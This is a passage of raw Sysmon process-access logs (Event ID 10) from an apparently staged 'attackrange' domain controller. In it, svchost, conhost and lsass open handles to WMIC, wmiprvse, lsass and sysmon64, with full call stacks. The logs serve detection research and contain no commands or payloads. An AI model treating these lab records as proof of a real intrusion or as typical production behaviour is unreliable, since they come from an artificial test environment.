C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5229,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.846\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-0010583F0800}\r\nTargetProcessId: 3252\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.846","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","SourceProcessId":"4536","SourceThreadId":"4616","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-0010583F0800}","TargetProcessId":"3252","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5230,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.862\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-0010583F0800}\r\nTargetProcessId: 3252\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.862","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-0010583F0800}","TargetProcessId":"3252","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5231,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.862\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-0010583F0800}\r\nTargetProcessId: 3252\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.862","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-0010583F0800}","TargetProcessId":"3252","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5232,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.862\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-0010583F0800}\r\nTargetProcessId: 3252\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.862","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-0010583F0800}","TargetProcessId":"3252","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5233,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.955\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.955","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5234,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5235,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5236,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nTargetProcessId: 4288\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 